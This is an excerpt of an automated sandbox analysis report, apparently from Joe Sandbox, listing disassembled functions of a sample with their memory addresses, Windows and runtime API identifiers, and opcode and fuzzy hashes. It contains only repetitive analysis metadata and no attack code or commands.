                                                                                                                                                                          Function 00007FF70ECE22E8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 147COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID: vector too long
                                                                                                                                                                          • API String ID: 3668304517-2873823879
                                                                                                                                                                          • Opcode ID: 920f152083481ae005a5a79d005cbb5739c33784bc905db2e3eb9d35f49b6c22
                                                                                                                                                                          • Instruction ID: 187e6e740624ca248f2a7e43ca0686a7c558d7d45def93c6c6ee9c70de614152
                                                                                                                                                                          • Opcode Fuzzy Hash: 920f152083481ae005a5a79d005cbb5739c33784bc905db2e3eb9d35f49b6c22
                                                                                                                                                                          • Instruction Fuzzy Hash: 0C61B272A1878196E700AB60DC802AEB7B4FF84758F545239EA8D07BA5DF7DE490C710
                                                                                                                                                                          Function 00007FF70ECE6D28 Relevance: 3.2, APIs: 2, Instructions: 170COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3668304517-0
                                                                                                                                                                          • Opcode ID: 150d73363a9e39c99f3ded71800b8e520429e3335ab01881fa2be423d2bc2c13
                                                                                                                                                                          • Instruction ID: 5c67bff6a795863666276738a52e89f3b09c6d6f0e4312ec0a3beb8818a87f34
                                                                                                                                                                          • Opcode Fuzzy Hash: 150d73363a9e39c99f3ded71800b8e520429e3335ab01881fa2be423d2bc2c13
                                                                                                                                                                          • Instruction Fuzzy Hash: 92719272B24A4195FB00EB64DC442AEB366EF54798F900236DA2D077D9DF3DE441C324
                                                                                                                                                                          Function 00007FF70ECD491C Relevance: 3.1, APIs: 2, Instructions: 100COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorFileLastPointer
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2976181284-0
                                                                                                                                                                          • Opcode ID: afbb24ce4a808c86d9ab97423e5b5b7dbeb16d4b7f73d0bc2ed342d630b90402
                                                                                                                                                                          • Instruction ID: c03616edfe053f1257c3f34eca550059e1ed423b1214595b9751a1384fc0cd32
                                                                                                                                                                          • Opcode Fuzzy Hash: afbb24ce4a808c86d9ab97423e5b5b7dbeb16d4b7f73d0bc2ed342d630b90402
                                                                                                                                                                          • Instruction Fuzzy Hash: 62310122B1D69252EA746B2ADD806BAA254FF04BD4F840131DF2D47B94DF3FE8418720
                                                                                                                                                                          Function 00007FF70ECE47F0 Relevance: 3.1, APIs: 2, Instructions: 86COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$CloseFind
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3587649625-0
                                                                                                                                                                          • Opcode ID: 20175d427c32e94b65b14eb522f67906f9b48ab8bab1200a0ddc17ac7add8826
                                                                                                                                                                          • Instruction ID: f0413e6e76966b60e7aaf16411a236d27e040dcee9a8f59d6a52b3e45a9a8cb7
                                                                                                                                                                          • Opcode Fuzzy Hash: 20175d427c32e94b65b14eb522f67906f9b48ab8bab1200a0ddc17ac7add8826
                                                                                                                                                                          • Instruction Fuzzy Hash: 6841D222F14B8595FB14AB68D8413ADB366FF487A8F900235DE6C13BD9DF799440C354
                                                                                                                                                                          Function 00007FF70ECD1EBC Relevance: 3.1, APIs: 2, Instructions: 83COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Item_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1746051919-0
                                                                                                                                                                          • Opcode ID: 736d537b3c063294d9cf34c2cbe03750f0e101bfe69a453e156390386c11d36b
                                                                                                                                                                          • Instruction ID: 247fa1efd92e0bfdd570e4735ba2491c5fab4bf2baa7dd4dcaa93139f5f4c53a
                                                                                                                                                                          • Opcode Fuzzy Hash: 736d537b3c063294d9cf34c2cbe03750f0e101bfe69a453e156390386c11d36b
                                                                                                                                                                          • Instruction Fuzzy Hash: 3831B022A1D781A1EA10AB25E8553AEF3A1EF847D0F984235EB9C07BD5DF3EE440C710
                                                                                                                                                                          Function 00007FF70ECD4C70 Relevance: 3.1, APIs: 2, Instructions: 76timeCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$BuffersFlushTime
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1392018926-0
                                                                                                                                                                          • Opcode ID: 14d6942ec359b5a95a3eda4e56e7a82c4a9158dc0f228e60d57ace847166d981
                                                                                                                                                                          • Instruction ID: 0e4fbfbb67e4757c9a01f8521ca85ded93cebad83a92894f57c557417088e1ea
                                                                                                                                                                          • Opcode Fuzzy Hash: 14d6942ec359b5a95a3eda4e56e7a82c4a9158dc0f228e60d57ace847166d981
                                                                                                                                                                          • Instruction Fuzzy Hash: 2921ED22F0E78665EAAAAB11D8013BBA790BF81794F994131CF5C06395EF3FD586C310
                                                                                                                                                                          Function 00007FF70ECDAEE0 Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LoadString
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2948472770-0
                                                                                                                                                                          • Opcode ID: dedc9b699e454723cd5290fbfd2bbed97dba7cc30504e392eb1ac5c410963244
                                                                                                                                                                          • Instruction ID: 8f7e16ae1d8b2fa86f51b445c67728423e62d3375354a2b6f9d38a8d2f795eec
                                                                                                                                                                          • Opcode Fuzzy Hash: dedc9b699e454723cd5290fbfd2bbed97dba7cc30504e392eb1ac5c410963244
                                                                                                                                                                          • Instruction Fuzzy Hash: E41173B5B08B418AEA54AB2AED40069F7A1EF98FC0BD4453ADE5C83320EF3DE5518354
                                                                                                                                                                          Function 00007FF70ECD4D50 Relevance: 3.0, APIs: 2, Instructions: 47COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorFileLastPointer
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2976181284-0
                                                                                                                                                                          • Opcode ID: f476d2bfd4726034d9589a57a35db9820aa07498a5a105237817cbeb34648ff6
                                                                                                                                                                          • Instruction ID: 801aef74461db6be8af82d31013c5b6b0f25786c1606ab0a979fc6623ab5d20a
                                                                                                                                                                          • Opcode Fuzzy Hash: f476d2bfd4726034d9589a57a35db9820aa07498a5a105237817cbeb34648ff6
                                                                                                                                                                          • Instruction Fuzzy Hash: 4811A521A1C64292EB64AB25E8803BAA360FF45BA4F944331EB7D536D4DF3ED592C710
                                                                                                                                                                          Function 00007FF70ECD215C Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ItemRectTextWindow$Clientswprintf
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3322643685-0
                                                                                                                                                                          • Opcode ID: 7b1a7923946a01b82bc000e866a5e8131c4a3fcb45aa136cf21fa47d66a637f8
                                                                                                                                                                          • Instruction ID: 0e47088b0f8f9d14c244e045aca0600120a47412af49bc35b1f13800515cea1b
                                                                                                                                                                          • Opcode Fuzzy Hash: 7b1a7923946a01b82bc000e866a5e8131c4a3fcb45aa136cf21fa47d66a637f8
                                                                                                                                                                          • Instruction Fuzzy Hash: F1015E24F0D34A91FF5D7762AD442BA9391AF45B44F884035DD4D072A9EF2FE9858320
                                                                                                                                                                          Function 00007FF70ED00E1C Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorFreeHeapLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 485612231-0
                                                                                                                                                                          • Opcode ID: 6c19af78ecb99c12c8b97ad79194141d8da1ece1a7cca7b9391e8fefba4d6bd8
                                                                                                                                                                          • Instruction ID: fecde82a8daf0b2617da7c52952c084fe74cc69b6413e06966ef9ef86f75124a
                                                                                                                                                                          • Opcode Fuzzy Hash: 6c19af78ecb99c12c8b97ad79194141d8da1ece1a7cca7b9391e8fefba4d6bd8
                                                                                                                                                                          • Instruction Fuzzy Hash: E6E0C210F0D24352FF18BBF39C143799290DF98B41F8C8830C94DD7292EF2CA4854220
                                                                                                                                                                          Function 00007FF70ECD6858 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CompareString_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1017591355-0
                                                                                                                                                                          • Opcode ID: 430d939a93e2044b0e1e3d9942c44c20aa3ee0a929bfcd53dbd863392709a890
                                                                                                                                                                          • Instruction ID: 95021dec2f9524fca0d5fcf746abd3bd2834ecac6b099c18975ead7cbd8b2375
                                                                                                                                                                          • Opcode Fuzzy Hash: 430d939a93e2044b0e1e3d9942c44c20aa3ee0a929bfcd53dbd863392709a890
                                                                                                                                                                          • Instruction Fuzzy Hash: 1961E311E1C64761FA64BA268C152BBE291AF44BD4FD48136EE8E076C6EF3FE451C231
                                                                                                                                                                          Function 00007FF70ECE4A98 Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3668304517-0
                                                                                                                                                                          • Opcode ID: 8b0c66916c3ebf02a7a7365df98f3750845a28750ae82fa8124e9099153cf43a
                                                                                                                                                                          • Instruction ID: 73be2c51708b49a715dd486c28ba8fa3ffada257e89653f52de60800e5f756c1
                                                                                                                                                                          • Opcode Fuzzy Hash: 8b0c66916c3ebf02a7a7365df98f3750845a28750ae82fa8124e9099153cf43a
                                                                                                                                                                          • Instruction Fuzzy Hash: CB71C122F18A52A5FB14EB65DC512BEB362BF44798F904131DD2E437D9DF3DE4409220
                                                                                                                                                                          Function 00007FF70ECE76F8 Relevance: 1.7, APIs: 1, Instructions: 178COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00007FF70ECD6288: FindClose.KERNELBASE(?,?,?,00007FF70ECDFFA5), ref: 00007FF70ECD62BD
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70ECE79DB
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1011579015-0
                                                                                                                                                                          • Opcode ID: 8cd53635dd342b9d8534c31d426f8ae7889e06c83b9fc669b72276e432744b53
                                                                                                                                                                          • Instruction ID: 525bfbe9e5be1e18ac8f91f24a1ae952871976701c99d24d956e3bc899d88c8a
                                                                                                                                                                          • Opcode Fuzzy Hash: 8cd53635dd342b9d8534c31d426f8ae7889e06c83b9fc669b72276e432744b53
                                                                                                                                                                          • Instruction Fuzzy Hash: 6B816831E0CB83A1FA60BB25EC5027AB391FF94758F94013AD99C433A5DF6EE8409361
                                                                                                                                                                          Function 00007FF70ECE9A70 Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3668304517-0
                                                                                                                                                                          • Opcode ID: a61f248b0a9ccd8a01cd042c2d40adab81ea10875d31861c1f1888002f278d03
                                                                                                                                                                          • Instruction ID: 03204d51ad8a8559df07e67c1642e5a698905ec6e6e8a87b41f74f1b5861ddc8
                                                                                                                                                                          • Opcode Fuzzy Hash: a61f248b0a9ccd8a01cd042c2d40adab81ea10875d31861c1f1888002f278d03
                                                                                                                                                                          • Instruction Fuzzy Hash: DD615421B1C68261EA60FB14EC952FEF290EFD4748F804175D98D47BE9DF7EE5809620
                                                                                                                                                                          Function 00007FF70ECD552C Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3668304517-0
                                                                                                                                                                          • Opcode ID: 36e23dbdec53020b1f835f80291cc46b6cf2a46ea1917f098bf880c412ad1992
                                                                                                                                                                          • Instruction ID: 5a65f343ff01a3ec0b49147200cd09a0cf3fd9acb0e1f50bd66c2e641fa935e8
                                                                                                                                                                          • Opcode Fuzzy Hash: 36e23dbdec53020b1f835f80291cc46b6cf2a46ea1917f098bf880c412ad1992
                                                                                                                                                                          • Instruction Fuzzy Hash: 0C41DF22A0CB4590EE14AB24D95537FA3A1EF44BD8F940134EA5D477A9EF3FE442C660
                                                                                                                                                                          Function 00007FF70ECFF2D8 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
